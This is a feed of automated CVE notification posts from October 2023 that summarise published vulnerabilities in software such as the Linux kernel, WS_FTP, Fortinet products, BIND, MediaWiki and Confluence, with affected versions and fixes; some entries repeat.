🚨 CVE-2023-28635vantage6 is privacy preserving federated learning infrastructure. Prior to version 4.0.0, malicious users may try to get access to resources they are not allowed to see, by creating resources with integers as names. One example where this is a risk, is when users define which users are allowed to run algorithms on their node. This may be defined by username or user id. Now, for example, if user id 13 is allowed to run tasks, and an attacker creates a username with username '13', they would be wrongly allowed to run an algorithm. There may also be other places in the code where such a mixup of resource ID or name leads to issues. Version 4.0.0 contains a patch for this issue. The best solution is to check when resources are created or modified, that the resource name always starts with a character.🎖@cveNotify |
|
| 2023-10-11 22:52:01 |
🚨 CVE-2023-35646In TBD of TBD, there is a possible stack buffer overflow due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-11 22:51:59 |
🚨 CVE-2023-43960An issue in DLINK DPH-400SE FRU 2.2.15.8 allows a remote attacker to escalate privileges via the User Modify function in the Maintenance/Access function component.🎖@cveNotify |
|
| 2023-10-11 22:51:58 |
🚨 CVE-2023-35645In tbd of tbd, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-11 22:51:57 |
🚨 CVE-2023-38817An issue in Inspect Element Ltd Echo.ac v.5.2.1.0 allows a local attacker to gain privileges via a crafted command to the echo_driver.sys component.🎖@cveNotify |
|
| 2023-10-11 20:23:05 |
🚨 CVE-2023-44826Cross Site Scripting vulnerability in ZenTaoPMS v.18.6 allows a local attacker to obtain sensitive information via a crafted script.🎖@cveNotify |
|
| 2023-10-11 20:23:04 |
🚨 CVE-2023-44827An issue in ZenTao Community Edition v.18.6 and before, ZenTao Biz v.8.6 and before, ZenTao Max v.4.7 and before allows an attacker to execute arbitrary code via a crafted script to the Office Conversion Settings function.🎖@cveNotify |
|
| 2023-10-11 20:23:03 |
🚨 CVE-2023-23930vantage6 is privacy preserving federated learning infrastructure. Versions prior to 4.0.0 use pickle, which has known security issue, as a default serialization module but that has known security issues. All users of vantage6 that post tasks with the default serialization are affected. Version 4.0.0 contains a patch. Users may specify JSON serialization as a workaround.🎖@cveNotify |
|
| 2023-10-11 20:23:02 |
🚨 CVE-2023-35645In tbd of tbd, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-11 20:23:01 |
🚨 CVE-2023-38817An issue in Inspect Element Ltd Echo.ac v.5.2.1.0 allows a local attacker to gain privileges via a crafted command to the echo_driver.sys component.🎖@cveNotify |
|
| 2023-10-11 20:22:59 |
🚨 CVE-2023-44961SQL Injection vulnerability in Koha Library Software 23.0.5.04 and before allows a remote attacker to obtain sensitive information via the intranet/cgi bin/cataloging/ysearch.pl. component.🎖@cveNotify |
|
| 2023-10-11 20:22:58 |
🚨 CVE-2023-44962File Upload vulnerability in Koha Library Software 23.05.04 and before allows a remote attacker to read arbitrary files via the upload-cover-image.pl component.🎖@cveNotify |
|
| 2023-10-11 20:22:57 |
🚨 CVE-2023-5495A vulnerability was found in QDocs Smart School 6.4.1. It has been classified as critical. This affects an unknown part of the file /course/filterRecords/ of the component HTTP POST Request Handler. The manipulation of the argument searchdata[0][title]/searchdata[0][searchfield]/searchdata[0][searchvalue] leads to sql injection. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-241647. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-10-11 20:22:56 |
🚨 CVE-2020-18336Cross Site Scripting (XSS) vulnerability found in Typora v.0.9.65 allows a remote attacker to obtain sensitive information via the PDF file exporting function.🎖@cveNotify |
|
| 2023-10-11 20:22:55 |
🚨 CVE-2023-3777A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.When nf_tables_delrule() is flushing table rules, it is not checked whether the chain is bound and the chain's owner rule can also release the objects in certain circumstances.We recommend upgrading past commit 6eaf41e87a223ae6f8e7a28d6e78384ad7e407f8.🎖@cveNotify |
|
| 2023-10-11 20:22:53 |
🚨 CVE-2023-40283An issue was discovered in l2cap_sock_release in net/bluetooth/l2cap_sock.c in the Linux kernel before 6.4.10. There is a use-after-free because the children of an sk are mishandled.🎖@cveNotify |
|
| 2023-10-11 20:22:51 |
🚨 CVE-2023-4128A use-after-free flaw was found in net/sched/cls_fw.c in classifiers (cls_fw, cls_u32, and cls_route) in the Linux Kernel. This flaw allows a local attacker to perform a local privilege escalation due to incorrect handling of the existing filter, leading to a kernel information leak issue.🎖@cveNotify |
|
| 2023-10-11 20:22:50 |
🚨 CVE-2023-4004A use-after-free flaw was found in the Linux kernel's netfilter in the way a user triggers the nft_pipapo_remove function with the element, without a NFT_SET_EXT_KEY_END. This issue could allow a local user to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-10-11 20:22:48 |
🚨 CVE-2023-3567A use-after-free flaw was found in vcs_read in drivers/tty/vt/vc_screen.c in vc_screen in the Linux Kernel. This issue may allow an attacker with local user access to cause a system crash or leak internal kernel information.🎖@cveNotify |
|
| 2023-10-11 20:22:47 |
🚨 CVE-2023-3609A use-after-free vulnerability in the Linux kernel's net/sched: cls_u32 component can be exploited to achieve local privilege escalation.If tcf_change_indev() fails, u32_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.We recommend upgrading past commit 04c55383fa5689357bcdd2c8036725a55ed632bc.🎖@cveNotify |
|
| 2023-10-11 20:22:46 |
🚨 CVE-2023-3776A use-after-free vulnerability in the Linux kernel's net/sched: cls_fw component can be exploited to achieve local privilege escalation.If tcf_change_indev() fails, fw_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.We recommend upgrading past commit 0323bce598eea038714f941ce2b22541c46d488f.🎖@cveNotify |
|
| 2023-10-11 20:22:45 |
🚨 CVE-2023-21400In multiple functions of io_uring.c, there is a possible kernel memory corruption due to improper locking. This could lead to local escalation of privilege in the kernel with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-11 20:22:43 |
🚨 CVE-2023-3090A heap out-of-bounds write vulnerability in the Linux Kernel ipvlan network driver can be exploited to achieve local privilege escalation.The out-of-bounds write is caused by missing skb->cb initialization in the ipvlan network driver. The vulnerability is reachable if CONFIG_IPVLAN is enabled.We recommend upgrading past commit 90cbed5247439a966b645b34eb0a2e037836ea8e.🎖@cveNotify |
|
| 2023-10-11 20:22:42 |
🚨 CVE-2023-42474SAP BusinessObjects Web Intelligence - version 420, has a URL with parameter that could be vulnerable to XSS attack. The attacker could send a malicious link to a user that would possibly allow an attacker to retrieve the sensitive information.🎖@cveNotify |
|
| 2023-10-11 20:22:41 |
🚨 CVE-2023-42475The Statutory Reporting application has a vulnerable file storage location, potentially enabling low privileged attacker to read server files with minimal impact on confidentiality.🎖@cveNotify |
|
| 2023-10-11 19:22:10 |
🚨 CVE-2023-40641In Messaging, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-10-11 19:22:09 |
🚨 CVE-2023-40640In SoundRecorder service, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-10-11 19:22:08 |
🚨 CVE-2023-23371A cleartext transmission of sensitive information vulnerability has been reported to affect QVPN Device Client. If exploited, the vulnerability could allow local authenticated administrators to read sensitive data via unspecified vectors.We have already fixed the vulnerability in the following version:QVPN Windows 2.2.0.0823 and later🎖@cveNotify |
|
| 2023-10-11 17:22:20 |
🚨 CVE-2001-1021Buffer overflows in WS_FTP 2.02 allow remote attackers to execute arbitrary code via long arguments to (1) DELE, (2) MDTM, (3) MLST, (4) MKD, (5) RMD, (6) RNFR, (7) RNTO, (8) SIZE, (9) STAT, (10) XMKD, or (11) XRMD.🎖@cveNotify |
|
| 2023-10-11 17:22:18 |
🚨 CVE-2002-0826Buffer overflow in WS_FTP FTP Server 3.1.1 allows remote authenticated users to execute arbitrary code via a long SITE CPWD command.🎖@cveNotify |
|
| 2023-10-11 17:22:17 |
🚨 CVE-2006-5000Multiple buffer overflows in WS_FTP Server 5.05 before Hotfix 1, and possibly other versions down to 5.0, have unknown impact and remote authenticated attack vectors via the (1) XCRC, (2) XMD5, and (3) XSHA1 commands. NOTE: in the early publication of this identifier on 20060926, the description was used for the wrong issue.🎖@cveNotify |
|
| 2023-10-11 17:22:16 |
🚨 CVE-2004-1643WS_FTP 5.0.2 allows remote authenticated users to cause a denial of service (CPU consumption) via a CD command that contains an invalid path with a "../" sequence.🎖@cveNotify |
|
| 2023-10-11 17:22:15 |
🚨 CVE-2004-1884Ipswitch WS_FTP Server 4.0.2 has a backdoor XXSESS_MGRYY username with a default password, which allows remote attackers to gain access.🎖@cveNotify |
|
| 2023-10-11 17:22:14 |
🚨 CVE-2008-0590Buffer overflow in Ipswitch WS_FTP Server with SSH 6.1.0.0 allows remote authenticated users to cause a denial of service (crash) and possibly execute arbitrary code via a long opendir command.🎖@cveNotify |
|
| 2023-10-11 17:22:12 |
🚨 CVE-2003-0772Multiple buffer overflows in WS_FTP 3 and 4 allow remote authenticated users to cause a denial of service and possibly execute arbitrary code via long (1) APPE (append) or (2) STAT (status) arguments.🎖@cveNotify |
|
| 2023-10-11 17:22:11 |
🚨 CVE-2004-1848Ipswitch WS_FTP Server 4.0.2 allows remote attackers to cause a denial of service (disk consumption) and bypass file size restrictions via a REST command with a large size argument, followed by a STOR of a smaller file.🎖@cveNotify |
|
| 2023-10-11 17:22:10 |
🚨 CVE-1999-1171IPswitch WS_FTP allows local users to gain additional privileges and modify or add mail accounts by setting the "flags" registry key to 1920.🎖@cveNotify |
|
| 2023-10-11 17:22:09 |
🚨 CVE-1999-1170IPswitch IMail allows local users to gain additional privileges and modify or add mail accounts by setting the "flags" registry key to 1920.🎖@cveNotify |
|
| 2023-10-11 17:22:08 |
🚨 CVE-2004-1885Ipswitch WS_FTP Server 4.0.2 allows remote authenticated users to execute arbitrary programs as SYSTEM by using the SITE command to modify certain iFtpSvc options that are handled by iftpmgr.exe.🎖@cveNotify |
|
| 2023-10-11 17:22:07 |
🚨 CVE-2004-1883Multiple buffer overflows in Ipswitch WS_FTP Server 4.0.2 (1) allow remote authenticated users to execute arbitrary code by causing a large error string to be generated by the ALLO handler, or (2) may allow remote FTP administrators to execute arbitrary code by causing a long hostname or username to be inserted into a reply to a STAT command while a file is being transferred.🎖@cveNotify |
|
| 2023-10-11 17:22:06 |
🚨 CVE-2023-36549A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands via specifically crafted http get request parameters.🎖@cveNotify |
|
| 2023-10-11 17:22:05 |
🚨 CVE-2023-36550A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands via specifically crafted http get request parameters.🎖@cveNotify |
|
| 2023-10-11 17:22:04 |
🚨 CVE-2023-36547A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands via specifically crafted http get request parameters.🎖@cveNotify |
|
| 2023-10-11 17:22:02 |
🚨 CVE-2023-36548A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands via specifically crafted http get request parameters.🎖@cveNotify |
|
| 2023-10-11 17:22:00 |
🚨 CVE-2023-34993A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands via specifically crafted http get request parameters.🎖@cveNotify |
|
| 2023-10-11 17:21:59 |
🚨 CVE-2023-34985A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands via specifically crafted HTTP get request parameters.🎖@cveNotify |
|
| 2023-10-11 17:21:58 |
🚨 CVE-2023-34988A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands via specifically crafted HTTP get request parameters.🎖@cveNotify |
|
| 2023-10-11 14:52:33 |
🚨 CVE-2023-44116Vulnerability of access permissions not being strictly verified in the APPWidget module.Successful exploitation of this vulnerability may cause some apps to run without being authorized.🎖@cveNotify |
|
| 2023-10-11 14:52:31 |
🚨 CVE-2023-44118Vulnerability of undefined permissions in the MeeTime module.Successful exploitation of this vulnerability will affect availability and confidentiality.🎖@cveNotify |
|
| 2023-10-11 14:52:29 |
🚨 CVE-2023-44119Vulnerability of mutual exclusion management in the kernel module.Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2023-10-11 14:52:27 |
🚨 CVE-2023-26370Adobe Photoshop versions 23.5.5 (and earlier) and 24.7 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-10-11 14:52:25 |
🚨 CVE-2023-41304Parameter verification vulnerability in the window module.Successful exploitation of this vulnerability may cause the size of an app window to be adjusted to that of a floating window.🎖@cveNotify |
|
| 2023-10-11 14:52:22 |
🚨 CVE-2023-44095Use-After-Free (UAF) vulnerability in the surfaceflinger module.Successful exploitation of this vulnerability can cause system crash.🎖@cveNotify |
|
| 2023-10-11 14:52:20 |
🚨 CVE-2023-44097Vulnerability of the permission to access device SNs being improperly managed.Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-10-11 14:52:19 |
🚨 CVE-2023-44101The Bluetooth module has a vulnerability in permission control for broadcast notifications.Successful exploitation of this vulnerability may affect confidentiality.🎖@cveNotify |
|
| 2023-10-11 14:52:17 |
🚨 CVE-2023-44102Broadcast permission control vulnerability in the Bluetooth module.Successful exploitation of this vulnerability can cause the Bluetooth function to be unavailable.🎖@cveNotify |
|
| 2023-10-11 14:52:15 |
🚨 CVE-2023-44103Out-of-bounds read vulnerability in the Bluetooth module.Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-10-11 14:52:13 |
🚨 CVE-2023-44104Broadcast permission control vulnerability in the Bluetooth module.Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-10-11 14:52:11 |
🚨 CVE-2023-44106API permission management vulnerability in the Fwk-Display module.Successful exploitation of this vulnerability may cause features to perform abnormally.🎖@cveNotify |
|
| 2023-10-11 14:52:09 |
🚨 CVE-2023-44110Out-of-bounds access vulnerability in the audio module.Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2023-10-11 14:52:07 |
🚨 CVE-2023-44111Vulnerability of brute-force attacks on the device authentication module.Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-10-11 14:52:05 |
🚨 CVE-2023-44981Authorization Bypass Through User-Controlled Key vulnerability in Apache ZooKeeper. If SASL Quorum Peer authentication is enabled in ZooKeeper (quorum.auth.enableSasl=true), the authorization is done by verifying that the instance part in SASL authentication ID is listed in zoo.cfg server list. The instance part in SASL auth ID is optional and if it's missing, like 'eve@EXAMPLE.COM', the authorization check will be skipped. As a result an arbitrary endpoint could join the cluster and begin propagating counterfeit changes to the leader, essentially giving it complete read-write access to the data tree. Quorum Peer authentication is not enabled by default.Users are recommended to upgrade to version 3.9.1, 3.8.3, 3.7.2, which fixes the issue.Alternately ensure the ensemble election/quorum communication is protected by a firewall as this will mitigate the issue.See the documentation for more details on correct cluster administration.🎖@cveNotify |
|
| 2023-10-11 14:52:03 |
🚨 CVE-2023-5520Out-of-bounds Read in GitHub repository gpac/gpac prior to 2.2.2.🎖@cveNotify |
|
| 2023-10-11 14:52:02 |
🚨 CVE-2023-5521Incorrect Authorization in GitHub repository tiann/kernelsu prior to v0.6.9.🎖@cveNotify |
|
| 2023-10-11 14:52:00 |
🚨 CVE-2023-38216Adobe Bridge versions 12.0.4 (and earlier) and 13.0.3 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-10-11 14:51:59 |
🚨 CVE-2023-38217Adobe Bridge versions 12.0.4 (and earlier) and 13.0.3 (and earlier) are affected by an Out-of-bounds Read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-10-11 14:51:57 |
🚨 CVE-2023-44100Broadcast permission control vulnerability in the Bluetooth module.Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-10-11 05:52:17 |
🚨 CVE-2023-43641libcue provides an API for parsing and extracting data from CUE sheets. Versions 2.2.1 and prior are vulnerable to out-of-bounds array access. A user of the GNOME desktop environment can be exploited by downloading a cue sheet from a malicious webpage. Because the file is saved to `~/Downloads`, it is then automatically scanned by tracker-miners. And because it has a .cue filename extension, tracker-miners use libcue to parse the file. The file exploits the vulnerability in libcue to gain code execution.🎖@cveNotify |
|
| 2023-10-11 05:52:15 |
🚨 CVE-2023-22338Out-of-bounds read in some Intel(R) oneVPL GPU software before version 22.6.5 may allow an authenticated user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-10-11 05:52:14 |
🚨 CVE-2023-22840Improper neutralization in software for the Intel(R) oneVPL GPU software before version 22.6.5 may allow an authenticated user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-10-11 05:52:13 |
🚨 CVE-2023-43804urllib3 is a user-friendly HTTP client library for Python. urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly. This issue has been patched in urllib3 version 1.26.17 or 2.0.5.🎖@cveNotify |
|
| 2023-10-11 05:52:12 |
🚨 CVE-2023-3341The code that processes control channel messages sent to `named` calls certain functions recursively during packet parsing. Recursion depth is only limited by the maximum accepted packet size; depending on the environment, this may cause the packet-parsing code to run out of available stack memory, causing `named` to terminate unexpectedly. Since each incoming control channel message is fully parsed before its contents are authenticated, exploiting this flaw does not require the attacker to hold a valid RNDC key; only network access to the control channel's configured TCP port is necessary.This issue affects BIND 9 versions 9.2.0 through 9.16.43, 9.18.0 through 9.18.18, 9.19.0 through 9.19.16, 9.9.3-S1 through 9.16.43-S1, and 9.18.0-S1 through 9.18.18-S1.🎖@cveNotify |
|
| 2023-10-11 05:52:11 |
🚨 CVE-2023-4236A flaw in the networking code handling DNS-over-TLS queries may cause `named` to terminate unexpectedly due to an assertion failure. This happens when internal data structures are incorrectly reused under significant DNS-over-TLS query load.This issue affects BIND 9 versions 9.18.0 through 9.18.18 and 9.18.11-S1 through 9.18.18-S1.🎖@cveNotify |
|
| 2023-10-11 05:52:09 |
🚨 CVE-2022-0856libcaca is affected by a Divide By Zero issue via img2txt, which allows a remote malicious user to cause a Denial of Service🎖@cveNotify |
|
| 2023-10-11 05:52:08 |
🚨 CVE-2023-45363An issue was discovered in ApiPageSet.php in MediaWiki before 1.35.12, 1.36.x through 1.39.x before 1.39.5, and 1.40.x before 1.40.1. It allows attackers to cause a denial of service (unbounded loop and RequestTimeoutException) when querying pages redirected to other variants with redirects and converttitles set.🎖@cveNotify |
|
| 2023-10-11 05:52:07 |
🚨 CVE-2023-45364An issue was discovered in includes/page/Article.php in MediaWiki 1.36.x through 1.39.x before 1.39.5 and 1.40.x before 1.40.1. Deleted revision existence is leaked due to incorrect permissions being checked. This reveals that a given revision ID belonged to the given page title, and its timestamp, both of which are not supposed to be public information.🎖@cveNotify |
|
| 2023-10-11 05:52:03 |
🚨 CVE-2023-3550Mediawiki v1.40.0 does not validate namespaces used in XML files.Therefore, if the instance administrator allows XML file uploads,a remote attacker with a low-privileged user account can use thisexploit to become an administrator by sending a malicious link tothe instance administrator.🎖@cveNotify |
|
| 2023-10-11 05:52:02 |
🚨 CVE-2023-44689e-Gov Client Application (Windows version) versions prior to 2.1.1.0 and e-Gov Client Application (macOS version) versions prior to 1.1.1.0 are vulnerable to improper authorization in handler for custom URL scheme. A crafted URL may direct the product to access an arbitrary website. As a result, the user may become a victim of a phishing attack.🎖@cveNotify |
|
| 2023-10-11 05:52:01 |
🚨 CVE-2023-45194Use of default credentials vulnerability in MR-GM2 firmware Ver. 3.00.03 and earlier, and MR-GM3 (-D/-K/-S/-DK/-DKS/-M/-W) firmware Ver. 1.03.45 and earlier allows a network-adjacent unauthenticated attacker to intercept wireless LAN communication, when the affected product performs the communication without changing the pre-shared key from the factory-default configuration.🎖@cveNotify |
|
| 2023-10-11 05:52:00 |
🚨 CVE-2023-5511Cross-Site Request Forgery (CSRF) in GitHub repository snipe/snipe-it prior to v.6.2.3.🎖@cveNotify |
|
| 2023-10-11 05:51:59 |
🚨 CVE-2023-44487The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.🎖@cveNotify |
|
| 2023-10-11 01:22:02 |
🚨 CVE-2023-36126There is a Cross Site Scripting (XSS) vulnerability in the "theme" parameter of preview.php in PHPJabbers Appointment Scheduler v3.0🎖@cveNotify |
|
| 2023-10-11 01:22:01 |
🚨 CVE-2023-26220The Spotfire Library component of TIBCO Software Inc.'s Spotfire Analyst and Spotfire Server contains an easily exploitable vulnerability that allows a low privileged attacker with network access to execute a Stored Cross Site Scripting (XSS) on the affected system. A successful attack using this vulnerability requires human interaction from a person other than the attacker. Affected releases are TIBCO Software Inc.'s Spotfire Analyst: versions 11.4.7 and below, versions 11.5.0, 11.6.0, 11.7.0, 11.8.0, 12.0.0, 12.0.1, 12.0.2, 12.0.3, and 12.0.4, versions 12.1.0 and 12.1.1 and Spotfire Server: versions 11.4.11 and below, versions 11.5.0, 11.6.0, 11.6.1, 11.6.2, 11.6.3, 11.7.0, 11.8.0, 11.8.1, 12.0.0, 12.0.1, 12.0.2, 12.0.3, 12.0.4, and 12.0.5, versions 12.1.0 and 12.1.1.🎖@cveNotify |
|
| 2023-10-10 23:22:03 |
🚨 CVE-2023-5214In Puppet Bolt versions prior to 3.27.4, a path to escalate privileges was identified.🎖@cveNotify |
|
| 2023-10-10 23:22:02 |
🚨 CVE-2023-44807D-Link DIR-820L 1.05B03 has a stack overflow vulnerability in the cancelPing function.🎖@cveNotify |
|
| 2023-10-10 23:22:01 |
🚨 CVE-2023-30995IBM Aspera Faspex 4.0 through 4.4.2 and 5.0 through 5.0.5 could allow a malicious actor to bypass IP whitelist restrictions using a specially crafted HTTP request. IBM X-Force ID: 254268.🎖@cveNotify |
|
| 2023-10-10 23:22:00 |
🚨 CVE-2023-43809Soft Serve is a self-hostable Git server for the command line. Prior to version 0.6.2, a security vulnerability in Soft Serve could allow an unauthenticated, remote attacker to bypass public key authentication when keyboard-interactive SSH authentication is active, through the `allow-keyless` setting, and the public key requires additional client-side verification for example using FIDO2 or GPG. This is due to insufficient validation procedures of the public key step during SSH request handshake, granting unauthorized access if the keyboard-interaction mode is utilized. An attacker could exploit this vulnerability by presenting manipulated SSH requests using keyboard-interactive authentication mode. This could potentially result in unauthorized access to the Soft Serve. Users should upgrade to the latest Soft Serve version `v0.6.2` to receive the patch for this issue. To workaround this vulnerability without upgrading, users can temporarily disable Keyboard-Interactive SSH Authentication using the `allow-keyless` setting.🎖@cveNotify |
|
| 2023-10-10 23:21:59 |
🚨 CVE-2023-35803IQ Engine before 10.6r2 on Extreme Network AP devices has a Buffer Overflow.🎖@cveNotify |
|
| 2023-10-10 23:21:58 |
🚨 CVE-2023-43321File Upload vulnerability in Digital China Networks DCFW-1800-SDC v.3.0 allows an authenticated attacker to execute arbitrary code via the wget function in the /sbin/cloudadmin.sh component.🎖@cveNotify |
|
| 2023-10-10 20:52:27 |
🚨 CVE-2023-22515Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances.Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue. For more details, please review the linked advisory on this CVE.🎖@cveNotify |
|
| 2023-10-10 20:52:25 |
🚨 CVE-2023-44487The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.🎖@cveNotify |
|
| 2023-10-10 20:52:24 |
🚨 CVE-2023-4128A use-after-free flaw was found in net/sched/cls_fw.c in classifiers (cls_fw, cls_u32, and cls_route) in the Linux Kernel. This flaw allows a local attacker to perform a local privilege escalation due to incorrect handling of the existing filter, leading to a kernel information leak issue.🎖@cveNotify |
|
| 2023-10-10 20:52:23 |
🚨 CVE-2023-4004A use-after-free flaw was found in the Linux kernel's netfilter in the way a user triggers the nft_pipapo_remove function with the element, without a NFT_SET_EXT_KEY_END. This issue could allow a local user to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-10-10 20:52:21 |
🚨 CVE-2023-3665A code injection vulnerability in Trellix ENS 10.7.0 April 2023 release and earlier, allowed a local user to disable the ENS AMSI component via environment variables,leading to denial of service and or the execution of arbitrary code.🎖@cveNotify |
|
| 2023-10-10 20:52:19 |
🚨 CVE-2023-3971An HTML injection flaw was found in Controller in the user interface settings. This flaw allows an attacker to capture credentials by creating a custom login page by injecting HTML, resulting in a complete compromise.🎖@cveNotify |
|
| 2023-10-10 20:52:18 |
🚨 CVE-2023-44389Zope is an open-source web application server. The title property, available on most Zope objects, can be used to store script code that is executed while viewing the affected object in the Zope Management Interface (ZMI). All versions of Zope 4 and Zope 5 are affected. Patches will be released with Zope versions 4.8.11 and 5.8.6🎖@cveNotify |
|
| 2023-10-10 20:52:16 |
🚨 CVE-2023-43799Altair is a GraphQL Client. Prior to version 5.2.5, the Altair GraphQL Client Desktop Application does not sanitize external URLs before passing them to the underlying system. Moreover, Altair GraphQL Client also does not isolate the context of the renderer process. This affects versions of the software running on MacOS, Windows, and Linux. Version 5.2.5 fixes this issue.🎖@cveNotify |
|
| 2023-10-10 20:52:15 |
🚨 CVE-2023-4237A flaw was found in the Ansible Automation Platform. When creating a new keypair, the ec2_key module prints out the private key directly to the standard output. This flaw allows an attacker to fetch those keys from the log files, compromising the system's confidentiality, integrity, and availability.🎖@cveNotify |
|
| 2023-10-10 20:52:14 |
🚨 CVE-2023-4380A logic flaw exists in Ansible. Whenever a private project is created with incorrect credentials, they are logged in plaintext. This flaw allows an attacker to retrieve the credentials from the log, resulting in the loss of confidentiality, integrity, and availability.🎖@cveNotify |
|
| 2023-10-10 20:52:12 |
🚨 CVE-2023-43793Misskey is an open source, decentralized social media platform. Prior to version 2023.9.0, by editing the URL, a user can bypass the authentication of the Bull dashboard, which is the job queue management UI, and access it. Version 2023.9.0 contains a fix. There are no known workarounds.🎖@cveNotify |
|
| 2023-10-10 20:52:11 |
🚨 CVE-2023-42808Common Voice is the web app for Mozilla Common Voice, a platform for collecting speech donations in order to create public domain datasets for training voice recognition-related tools. Version 1.88.2 is vulnerable to reflected Cross-Site Scripting given that user-controlled data flows to a path expression (path of a network request). This issue may lead to reflected Cross-Site Scripting (XSS) in the context of Common Voice’s server origin. As of time of publication, it is unknown whether any patches or workarounds exist.🎖@cveNotify |
|
| 2023-10-10 20:52:10 |
🚨 CVE-2023-36434Windows IIS Server Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-10-10 20:52:09 |
🚨 CVE-2023-36577Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-10-10 20:52:07 |
🚨 CVE-2023-36585Active Template Library Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-10-10 20:52:06 |
🚨 CVE-2023-36589Microsoft Message Queuing Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-10-10 18:52:22 |
🚨 CVE-2023-40718A interpretation conflict in Fortinet IPS Engine versions 7.321, 7.166 and 6.158 allows attacker to evade IPS features via crafted TCP packets.🎖@cveNotify |
|
| 2023-10-10 18:52:20 |
🚨 CVE-2023-41675A use after free vulnerability [CWE-416] in FortiOS version 7.2.0 through 7.2.4 and version 7.0.0 through 7.0.10 and FortiProxy version 7.2.0 through 7.2.2 and version 7.0.0 through 7.0.8 may allow an unauthenticated remote attacker to crash the WAD process via multiple crafted packets reaching proxy policies or firewall policies with proxy mode alongside SSL deep packet inspection.🎖@cveNotify |
|
| 2023-10-10 18:52:19 |
🚨 CVE-2023-41679An improper access control vulnerability [CWE-284] in FortiManager management interface 7.2.0 through 7.2.2, 7.0.0 through 7.0.7, 6.4.0 through 6.4.11, 6.2 all versions, 6.0 all versions may allow a remote and authenticated attacker with at least "device management" permission on his profile and belonging to a specific ADOM to add and delete CLI script on other ADOMs🎖@cveNotify |
|
| 2023-10-10 18:52:18 |
🚨 CVE-2023-41838An improper neutralization of special elements used in an os command ('os command injection') in FortiManager 7.4.0 and 7.2.0 through 7.2.3 may allow attacker to execute unauthorized code or commands via FortiManager cli.🎖@cveNotify |
|
| 2023-10-10 18:52:17 |
